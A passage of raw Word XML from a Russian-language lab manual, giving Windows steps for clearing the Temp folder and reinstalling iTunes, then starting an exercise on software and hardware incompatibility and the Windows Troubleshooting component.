            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Windows</w:t>
        </w:r>
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> 7.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Компьютер</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В окне «Компьютер» откройте диск «C:».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте папку «Пользователи».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте папку, которая названа вашим именем пользователя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Откройте папку AppData. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Если папка AppData отсутствует, может потребоваться настроить ОС Windows для отображения скрытых файлов и папок, как показано ниже.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Упорядочить</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Свойства папок и поиска</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Перейдите на вкладку </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вид</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установите флажок «Показывать скрытые файлы и папки». (В Windows 7 этот параметр называется «Показывать скрытые файлы, папки и диски».)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Нажмите кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ОК.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте папку Local двойным щелчком мыши.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Нажмите папку Temp правой кнопкой мыши и выберите </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В диалоговом окне подтверждения нажмите кнопку «Да».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если не удается удалить папку Temp, закройте все программы, особенно в области уведомлений на панели задач Windows, и повторите действия 7 и 8. Если по-прежнему не удается удалить папку Temp, откройте ее и удалите максимально возможное количество элементов, которые она содержит.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перезагрузите компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Установка последней версии программы iTunes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. После выполнения указанных выше действий по очистке каталога Temp и полному удалению программы iTunes и связанных компонентов можно установить самую последнюю версию iTunes с веб-сайта </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.apple.com/ru/itunes/download/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительные действия по устранению неполадок. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После выполнения каждого из перечисленных ниже действий нужно полностью удалить iTunes и связанные компоненты, после чего снова установить данную программу, чтобы определить, была ли устранена проблема. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId181" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>1. Проверка наличия доступа под учетной записью администратора</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Чтобы установить программное обеспечение iTunes или QuickTime, необходимо войти в операционную систему компьютера в качестве администратора. Если нет уверенности в наличии доступа под учетной записью администратора, рекомендуется изучить следующую статью корпорации Майкрософт: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Как войти в систему в качестве администратора?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">В противном случае обратитесь к справочной документации Microsoft, свяжитесь со своим техническим специалистом или перейдите на веб-сайт </w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>support.microsoft.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> для получения дополнительной информации. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>2. Проверка того, что имена папок не содержат нестандартных символов</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если программа установки iTunes (iTunesSetup) не отвечает или зависла после запуска, возможно, название папки, в которой она находится, содержит нестандартные символы. В этом случае переименуйте папку или переместите перед запуском программу установки iTunes в другое место, например на рабочий стол. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>3. Установка последних обновлений для ОС Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Убедитесь в том, что установлены самые последние обновления ОС Microsoft Windows. Чтобы загрузить самые последние обновления, перейдите на страницу </w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Центра обновления Microsoft Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для работы программы iTunes для Windows требуется ОС Windows XP, Windows Vista или Windows 7 с установленным пакетом обновления самой последней версии. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>4. Отключение другого конфликтующего программного обеспечения</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007407C1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Некоторые фоновые процессы в ОС Windows могут вызвать ошибки в других программах и процессах. Эти конфликты могут помешать установке таких программ, как iTunes. Чтобы отключить конфликтующие процессы, настройте выборочную загрузку компьютера с помощью MSConfig.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007407C1" w:rsidRPr="00617AC0" w:rsidRDefault="007407C1" w:rsidP="007407C1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Некоторые программы для обеспечения безопасности, выпущенные другими компаниями, невозможно отключить с помощью выборочной загрузки (MSConfig). По этой причине в процессе устранения неполадок с установкой может потребоваться отключить или даже удалить подобные программы. Если программы для обеспечения безопасности установлены и по-прежнему возникают проблемы с установкой iTunes или QuickTime для Windows, выполните действия, описанные в статье «</w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>iTunes: устранение неполадок с программным обеспечением безопасности</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc507788259"/>
      <w:bookmarkStart w:id="99" w:name="_Toc507788534"/>
      <w:bookmarkStart w:id="100" w:name="_Toc22636503"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 3. Выявление проблем несовместимости программного обеспечения и оборудования</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rStyle w:val="FontStyle56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="FontStyle56"/>
          <w:b/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rStyle w:val="FontStyle56"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться определять совместимость программного обеспечения отраслевой направленности с операционными системами и делать вывод о дальнейшей возможности его установки и настройки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткие теоретические сведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="101" w:name="_Toc507512210"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Организация действий по устранению проблем по настройке программ отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="101"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Компонент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Устранение неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>обзавелся графическим интерфейсом и теперь пользователю, выполняющему поиск неисправностей поможет Мастер, который попытается идентифицировать источник проблемы, предоставит инструкции для решения проблемы или решит ее автоматически. Несмотря на то, что компонент</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Устранения неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> не рассчитаны на решение всех возможных проблем, рекомендуется использовать его в качестве первого этапа работ по устранению неполадок, так как это может сэкономить время и избавить пользователя от лишних действий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Открыть компонент </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Устранение неполадок </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>можно из нескольких мест:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Панель управления - Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления - Восстановление - Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Центр поддержки - Устранение неполадок</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Кроме того, запустить компонент можно и из некоторых работающих приложений. Например, если IE не может открыть веб-сайт, щелкните кнопку</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Диагностика проблем подключения</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Запустится мастер Диагностики сетей, который входит в пакет поиска неисправностей компонента Устранение неполадок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B108F3" w:rsidRPr="00617AC0" w:rsidRDefault="00B108F3" w:rsidP="00B108F3">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для знакомства запустим компонент</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Устранение неполадок</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панели управления</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
